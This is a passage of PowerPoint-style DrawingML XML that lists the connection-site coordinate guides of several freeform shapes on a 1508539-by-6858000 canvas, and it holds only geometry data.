              <a:gd name="connsiteX104" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY144" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY145" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY146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4248 w 1508539"/>
              <a:gd name="connsiteY10" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 164588 w 1508539"/>
              <a:gd name="connsiteY11" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 166997 w 1508539"/>
              <a:gd name="connsiteY12" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 167342 w 1508539"/>
              <a:gd name="connsiteY13" fmla="*/ 6560598 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 169039 w 1508539"/>
              <a:gd name="connsiteY14" fmla="*/ 6553006 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 215389 w 1508539"/>
              <a:gd name="connsiteY15" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 226078 w 1508539"/>
              <a:gd name="connsiteY16" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 233311 w 1508539"/>
              <a:gd name="connsiteY17" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 234746 w 1508539"/>
              <a:gd name="connsiteY18" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 239104 w 1508539"/>
              <a:gd name="connsiteY19" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 241880 w 1508539"/>
              <a:gd name="connsiteY20" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY21" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY22" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY23" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 272933 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 345501 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY144" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY145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4248 w 1508539"/>
              <a:gd name="connsiteY10" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 164588 w 1508539"/>
              <a:gd name="connsiteY11" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 166997 w 1508539"/>
              <a:gd name="connsiteY12" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 167342 w 1508539"/>
              <a:gd name="connsiteY13" fmla="*/ 6560598 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 201349 w 1508539"/>
              <a:gd name="connsiteY14" fmla="*/ 6530567 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 215389 w 1508539"/>
              <a:gd name="connsiteY15" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 226078 w 1508539"/>
              <a:gd name="connsiteY16" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 233311 w 1508539"/>
              <a:gd name="connsiteY17" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 234746 w 1508539"/>
              <a:gd name="connsiteY18" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 239104 w 1508539"/>
              <a:gd name="connsiteY19" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 241880 w 1508539"/>
              <a:gd name="connsiteY20" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY21" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY22" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY23" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 272933 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 345501 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5159961 h 6858000"/>
